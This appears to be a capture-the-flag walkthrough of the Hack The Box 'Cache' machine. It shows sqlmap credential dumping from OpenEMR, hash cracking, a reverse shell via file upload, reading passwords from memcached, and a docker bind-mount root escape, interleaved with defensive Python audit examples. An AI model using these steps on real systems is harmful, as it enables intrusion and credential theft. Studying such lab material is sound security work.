2020-05-28

HTB::Cache Walkthrough

0x01 Info Card

0x02 Tools and Tips

  • nmap
  • cewl
  • wfuzz
  • sqlmap
  • openEMR exploit
  • memcached exploit
  • docker priv

0x03 Pentesting

Initial Enumeration

nmap scan:

# Nmap 7.80 scan initiated Wed May 20 16:58:59 2020 as: nmap -sC -sV -Pn -oN ippsec_scan.txt 10.10.10.188
Nmap scan report for 10.10.10.188
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
| 256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_ 256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 20 17:00:01 2020 -- 1 IP address (1 host up) scanned in 61.63 seconds

Port 80

The home page gives no useful information, so try brute-forcing:

The page loads functionality.js:

$(function(){

var error_correctPassword = false;
var error_username = false;

function checkCorrectPassword(){
var Password = $("#password").val();
if(Password != 'H@v3_fun'){
alert("Password didn't Match");
error_correctPassword = true;
}
}
function checkCorrectUsername(){
var Username = $("#username").val();
if(Username != "ash"){
alert("Username didn't Match");
error_username = true;
}
}
$("#loginform").submit(function(event) {
/* Act on the event */
error_correctPassword = false;
checkCorrectPassword();
error_username = false;
checkCorrectUsername();


if(error_correctPassword == false && error_username ==false){
return true;
}
else{
return false;
}
});

});

So there is a username and password, ash:H@v3_fun. Logging in with them leads nowhere exploitable either, so look at the Author page next:

I was really out of ideas, so I messaged a few people on the HTB forum. They hinted that I should use cewl to extract the Author page's information and FUZZ the HOST header.

Only later did I understand: take the words on this page and use cewl to generate a wordlist that contains the domain name:

# kali @ kali in ~/HackTheBox/Cache [16:24:16]
$ cewl -w wordlist.txt -d 10 -m 1 http://10.10.10.188/author.html
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

Use wfuzz to look for the virtual host name:

# kali @ kali in ~/HackTheBox/Cache [16:52:57] 
$ wfuzz -w wordlist.txt -H "HOST: FUZZ.htb" -u http://10.10.10.188/ --hc 400 --hh 8193

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.188/
Total requests: 42

===================================================================
ID Response Lines Word Chars Payload
===================================================================

000000037: 302 0 L 0 W 0 Ch "HMS"

Total time: 2.130227
Processed Requests: 42
Filtered Requests: 41
Requests/sec.: 19.71620

The --hc (hide responses with the given status code) and --hh 8193 (hide responses of 8193 characters, the size the default site returns for every unknown host) options filter out the uninteresting responses.

Add hms.htb to /etc/hosts.

HMS.htb

Weak passwords get nowhere, so look for public exploits:

There are plenty of exploits for different versions. I tried OpenEMR < 5.0.1 - (Authenticated) Remote Code Execution, but when run it asks for a system account and password. Googling OpenEMR turned up a YouTube video about a related SQL injection vulnerability.

https://www.youtube.com/watch?v=DJSQ8Pk_7hc&t=73s

Following the steps in the video, first visit http://hms.htb/portal

Click Register, then visit http://hms.htb/portal/add_edit_event_user.php; the eid parameter here is vulnerable to SQL injection:
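The root cause behind an injectable eid is an untrusted request parameter concatenated into the SQL text. The following Python snippet is an added example, not OpenEMR code: the events table is a constructed stand-in for the real schema, and sqlite3 is used so it runs offline. It shows the vulnerable pattern next to the parameterised fix, plus the cheap request-log heuristic a defender can use to spot tampering with a numeric parameter.

```python
import sqlite3


def make_db():
    """Constructed sample data; the table is a stand-in, not OpenEMR's schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE events (eid INTEGER PRIMARY KEY, title TEXT, owner TEXT)")
    conn.executemany(
        "INSERT INTO events VALUES (?, ?, ?)",
        [(1, "checkup", "alice"), (2, "surgery", "bob"), (3, "followup", "carol")],
    )
    conn.commit()
    return conn


def fetch_event_vulnerable(conn, eid):
    """The anti-pattern: the request parameter is pasted into the SQL text,
    so anything after the number becomes part of the WHERE clause."""
    sql = "SELECT eid, title, owner FROM events WHERE eid = " + str(eid)
    return conn.execute(sql).fetchall()


def fetch_event_safe(conn, eid):
    """The fix: validate the type up front and bind the value as a parameter.
    The driver sends the value separately; it is never interpreted as SQL."""
    try:
        eid_int = int(eid)
    except (TypeError, ValueError):
        raise ValueError("eid must be an integer") from None
    return conn.execute(
        "SELECT eid, title, owner FROM events WHERE eid = ?", (eid_int,)
    ).fetchall()


def safe_rejects(conn, eid):
    """True if the hardened lookup refuses the parameter instead of running it."""
    try:
        fetch_event_safe(conn, eid)
    except ValueError:
        return True
    return False


def looks_like_injection(param):
    """Detection heuristic for access-log review or a WAF rule: an eid that is
    not a bare integer (quotes, spaces, keywords) deserves a look."""
    return not param.strip().isdigit()


if __name__ == "__main__":
    db = make_db()
    print(fetch_event_vulnerable(db, "1"))          # one row
    print(fetch_event_vulnerable(db, "1 OR 1=1"))   # the whole table leaks
    print(fetch_event_safe(db, "1"))                # one row
    print(safe_rejects(db, "1 OR 1=1"))             # True
```

The two lookups differ only in where the value goes: into the statement string, or into the bound-parameter tuple. Type validation before binding is what makes the rejection explicit rather than silently returning nothing.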

Intercept the request with Burp and save the request data to req.txt:

GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=0bcd8bfgl4rl2sfc8qmg63u09b; PHPSESSID=juj09jki6pu38k34afv60j3vb9
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

dump database

Use sqlmap to enumerate the databases:

$ sqlmap -r req.txt --dbs --batch
[11:52:46] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[11:52:46] [INFO] fetching database names
[11:52:47] [INFO] retrieved: 'information_schema'
[11:52:48] [INFO] retrieved: 'openemr'
available databases [2]:
[*] information_schema
[*] openemr

From here it is just running sqlmap end to end: find the users_secure table, look at its username and password columns, and dump them:

[12:03:13] [INFO] fetching entries of column(s) '`password`, username' for table 'users_secure' in database 'openemr'
Database: openemr
Table: users_secure
[1 entry]
+---------------+--------------------------------------------------------------+
| username | password |
+---------------+--------------------------------------------------------------+
| openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. |
+---------------+--------------------------------------------------------------+

Crack the hash with john:

# kali @ kali in ~/HackTheBox/Cache [12:11:02] 
$ sudo john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx (?)
1g 0:00:00:00 DONE (2020-05-27 12:11) 1.694g/s 1464p/s 1464c/s 1464C/s tristan..felipe
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Login credentials obtained: openemr_admin:xxxxxx
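John's line "Cost 1 (iteration count) is 32" is the reason rockyou finished in under a second: the hash begins with $2a$05$, so bcrypt runs only 2^5 = 32 iterations. The Python below is an added example (not code from the page or from OpenEMR) that parses the hash shown in the dump into its fields and applies a work-factor policy; the minimum cost of 10 and the comparison target of 12 are assumptions for the example.

```python
import re

# Hash copied from the users_secure dump above (the page's value, not a constructed one).
OPENEMR_ADMIN_HASH = "$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B."

# Modular-crypt layout: $<variant>$<cost>$<22-char salt><31-char digest>, bcrypt's own base64 alphabet.
_BCRYPT_RE = re.compile(r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")


def parse_bcrypt(hash_str):
    """Split a bcrypt string into its fields; the iteration count is 2**cost."""
    m = _BCRYPT_RE.match(hash_str)
    if not m:
        raise ValueError("not a bcrypt hash")
    variant, cost, salt, digest = m.group(1), int(m.group(2)), m.group(3), m.group(4)
    return {"variant": variant, "cost": cost, "iterations": 2 ** cost,
            "salt": salt, "digest": digest}


def cost_ok(hash_str, min_cost=10):
    """Policy check: a hash below min_cost needs rehashing at next login.
    (10 is a common floor today; treat the exact number as an assumption.)"""
    return parse_bcrypt(hash_str)["cost"] >= min_cost


def slowdown_vs(hash_str, target_cost=12):
    """Factor by which each guess would slow down if the hash were at target_cost."""
    return 2 ** (target_cost - parse_bcrypt(hash_str)["cost"])


def audit_hashes(rows, min_cost=10):
    """rows: iterable of (username, hash). Returns the usernames failing the policy."""
    return [user for user, h in rows if not cost_ok(h, min_cost)]


if __name__ == "__main__":
    print(parse_bcrypt(OPENEMR_ADMIN_HASH))        # cost 5, iterations 32
    print(slowdown_vs(OPENEMR_ADMIN_HASH))        # 128
    print(audit_hashes([("openemr_admin", OPENEMR_ADMIN_HASH)]))
```

Running the same dump through audit_hashes is the check a defender wants after any credential-store review: the 32 iterations john reports are 128 times cheaper per guess than cost 12, which is the difference between a wordlist attack finishing instantly and taking days.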

upload reverse shell

Upload a reverse shell through the Administration->Files module, writing it into letter_templates/custom_pdf.php:

Listen on port 4444 locally, then visit http://hms.htb/sites/default/letter_templates/custom_pdf.php in the browser:

$ sudo nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.188] 54188
bash: cannot set terminal process group (2111): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cache:/var/www/hms.htb/public_html/sites/default/letter_templates$ id
<.htb/public_html/sites/default/letter_templates$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Getting User Access

Switch to the ash user with the credentials from functionality.js:

www-data@cache:/var/www$ su ash
su ash
Password: H@v3_fun
www-data@cache:/var/www$ id
id
uid=1000(ash) gid=1000(ash) groups=1000(ash)
ash@cache:~$ cat user.txt
cat user.txt
93bf------------------------8dfe

memcached exploit

Check which services are listening locally:

ash@cache:~$ netstat -tulpn
netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:11211 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -

Port 11211 is memcached. References on how it can be abused:

https://www.hackingarticles.in/penetration-testing-on-memcached-server/

https://niiconsulting.com/checkmate/2013/05/memcache-exploit/

fetch the slab statistics:

ash@cache:~$ telnet 127.0.0.1 11211
telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'
stats slabs
stats slabs
STAT 1:chunk_size 96
STAT 1:chunks_per_page 10922
STAT 1:total_pages 1
STAT 1:total_chunks 10922
STAT 1:used_chunks 5
STAT 1:free_chunks 10917
STAT 1:free_chunks_end 0
STAT 1:mem_requested 371
STAT 1:get_hits 1
STAT 1:cmd_set 7730
STAT 1:delete_hits 0
STAT 1:incr_hits 0
STAT 1:decr_hits 0
STAT 1:cas_hits 0
STAT 1:cas_badval 0
STAT 1:touch_hits 0
STAT active_slabs 1
STAT total_malloced 1048576
END

Look at the items organised under that slab id:

stats items
stats items
STAT items:1:number 5
STAT items:1:number_hot 0
STAT items:1:number_warm 0
STAT items:1:number_cold 5
STAT items:1:age_hot 0
STAT items:1:age_warm 0
STAT items:1:age 52
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:evicted_active 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 220
STAT items:1:lrutail_reflocked 0
STAT items:1:moves_to_cold 7735
STAT items:1:moves_to_warm 0
STAT items:1:moves_within_lru 0
STAT items:1:direct_reclaims 0
STAT items:1:hits_to_hot 0
STAT items:1:hits_to_warm 0
STAT items:1:hits_to_cold 1
STAT items:1:hits_to_temp 0
END

dump all the keys:

stats cachedump 1 0
stats cachedump 1 0
ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END

Read the user and passwd keys:

get user
get user
VALUE user 0 5
luffy
END
get passwd
get passwd
VALUE passwd 0 9
0n3_p1ec3
END
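The cachedump and get exchanges above are plain memcached text protocol, so they are easy to parse and audit. The Python below is an added example, not code from the page or from the memcached project: it parses both response shapes (the samples are constructed copies of the responses shown, with the \r\n line endings used on the wire) and flags keys whose names suggest a secret sitting in the cache in the clear. The keyword list used for that heuristic is an assumption. Note that a get response is length-delimited, so the parser reads exactly the advertised number of bytes rather than splitting on newlines.

```python
import re

# Constructed copies of the 'stats cachedump 1 0' and 'get' responses shown above.
CACHEDUMP_SAMPLE = (
    b"ITEM link [21 b; 0 s]\r\n"
    b"ITEM user [5 b; 0 s]\r\n"
    b"ITEM passwd [9 b; 0 s]\r\n"
    b"ITEM file [7 b; 0 s]\r\n"
    b"ITEM account [9 b; 0 s]\r\n"
    b"END\r\n"
)
GET_SAMPLE = b"VALUE user 0 5\r\nluffy\r\nVALUE passwd 0 9\r\n0n3_p1ec3\r\nEND\r\n"

_ITEM_RE = re.compile(rb"^ITEM (\S+) \[(\d+) b; (\d+) s\]$")

# Key names that suggest a secret is cached in the clear (heuristic list; an assumption).
_SENSITIVE_RE = re.compile(r"pass|pwd|secret|token|cred|account|key", re.I)


def parse_cachedump(raw):
    """Parse 'stats cachedump' output into dicts. exptime 0 means the item never expires."""
    items = []
    for line in raw.split(b"\r\n"):
        if line == b"END":
            break
        m = _ITEM_RE.match(line)
        if m:
            items.append({"key": m.group(1).decode(), "bytes": int(m.group(2)),
                          "exptime": int(m.group(3))})
    return items


def parse_get(raw):
    """Parse a 'get' response into {key: (flags, value_bytes)}.
    Each data block is exactly <bytes> long and may itself contain \\r\\n,
    so it is read by length, not by line."""
    out = {}
    pos = 0
    while True:
        end = raw.index(b"\r\n", pos)          # ValueError on a truncated response
        line = raw[pos:end]
        pos = end + 2
        if line == b"END":
            return out
        parts = line.split()
        if len(parts) < 4 or parts[0] != b"VALUE":
            raise ValueError("unexpected line: %r" % line)
        key, flags, nbytes = parts[1].decode(), int(parts[2]), int(parts[3])
        value = raw[pos:pos + nbytes]
        if raw[pos + nbytes:pos + nbytes + 2] != b"\r\n":
            raise ValueError("data block for %s is not %d bytes" % (key, nbytes))
        out[key] = (flags, value)
        pos += nbytes + 2


def audit_keys(items):
    """Keys whose names look like secrets. Anything listed here is readable by every
    local account that can reach 127.0.0.1:11211, which is exactly what happened above."""
    return [it["key"] for it in items if _SENSITIVE_RE.search(it["key"])]


def never_expiring(items):
    """Keys with no expiry: a leaked secret stays readable until restart or eviction."""
    return [it["key"] for it in items if it["exptime"] == 0]


if __name__ == "__main__":
    items = parse_cachedump(CACHEDUMP_SAMPLE)
    print(audit_keys(items))        # ['passwd', 'account']
    print(never_expiring(items))    # all five keys
    print(parse_get(GET_SAMPLE))
```

The mitigation this audit points at is not a memcached setting: credentials should not be cached at all, and a cache that must hold anything sensitive should require SASL or sit on a socket that only the application user can open, instead of a localhost TCP port every shell on the box can reach.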

Log in over SSH:

$ ssh luffy@10.10.10.188
The authenticity of host '10.10.10.188 (10.10.10.188)' can't be established.
ECDSA key fingerprint is SHA256:/qQ34g2zzGVlmbMIKeD7JhlhDf/SPzgYFz000v+3KBI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.188' (ECDSA) to the list of known hosts.
luffy@10.10.10.188's password:
luffy@cache:~$ id
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)

Note that luffy is a member of the docker group.

Getting Root Access

GTFObins docker

List the docker images:

luffy@cache:~$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
ubuntu latest 2ca708c1c9cc 8 months ago 64.2MB

Escalate privileges following the method GTFObins gives:

luffy@cache:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash
root@container:/# id
uid=0(root) gid=0(root) groups=0(root)
root@container:/# cd
root@container:~# cat root.txt
32fc------------------------ceab
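The escalation works because docker group membership lets a user bind-mount the host's / into a container they control, so the group is root-equivalent. The Python below is an added example, not code from the page, from GTFObins or from Docker: it parses an /etc/group excerpt (constructed to match the id output above) to report root-equivalent group members, and inspects a `docker run` command line for bind mounts whose host side is /. Only the -v/--volume syntax is handled; --mount is left out as an assumption of the example.

```python
import shlex

# Constructed /etc/group excerpt matching the id output above (gid 999 = docker, luffy a member).
GROUP_SAMPLE = """root:x:0:
sudo:x:27:
docker:x:999:luffy
ash:x:1000:
luffy:x:1001:
"""

# Secondary groups whose members can reach root on the host (docker: bind-mount / and chroot).
ROOT_EQUIVALENT_GROUPS = ("docker",)


def group_members(group_text):
    """Parse /etc/group text into {group_name: [member, ...]}."""
    members = {}
    for line in group_text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _passwd, _gid, users = line.split(":", 3)
        members[name] = [u for u in users.split(",") if u]
    return members


def root_equivalent_members(group_text, groups=ROOT_EQUIVALENT_GROUPS):
    """Accounts holding root-equivalent access through group membership; the
    finding a host audit should raise before anyone has to crack anything."""
    m = group_members(group_text)
    return {g: m[g] for g in groups if m.get(g)}


def bind_mount_sources(cmdline):
    """Host-side paths of -v/--volume bind mounts in a `docker run` command line.
    An absolute host path means a bind mount; a bare name means a named volume."""
    argv = shlex.split(cmdline)
    sources = []
    i = 0
    while i < len(argv):
        arg = argv[i]
        spec = None
        if arg in ("-v", "--volume") and i + 1 < len(argv):
            spec = argv[i + 1]
            i += 1
        elif arg.startswith("--volume=") or arg.startswith("-v="):
            spec = arg.split("=", 1)[1]
        if spec is not None:
            host_side = spec.split(":", 1)[0]
            if host_side.startswith("/"):
                sources.append(host_side)
        i += 1
    return sources


def exposes_host_root(cmdline):
    """True when the command mounts the host's / into the container, as the
    GTFObins one-liner above does. Suitable for an authz-plugin or audit-log rule."""
    return "/" in bind_mount_sources(cmdline)


if __name__ == "__main__":
    print(root_equivalent_members(GROUP_SAMPLE))   # {'docker': ['luffy']}
    cmd = "docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash"
    print(bind_mount_sources(cmd), exposes_host_root(cmd))   # ['/'] True
```

Both checks point at the same fix: treat docker group membership as you would sudo without a password, grant it only to accounts that genuinely need it, and watch the daemon's audit log for bind mounts of the host root.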

0x04 Reference

Topic Url
OpenEMR vulnerability (video) https://www.youtube.com/watch?v=DJSQ8Pk_7hc&t=73s
Memcached https://www.hackingarticles.in/penetration-testing-on-memcached-server/
Memcached https://niiconsulting.com/checkmate/2013/05/memcache-exploit/
Docker https://gtfobins.github.io/gtfobins/docker/

Copyright © ca01h 2019-2021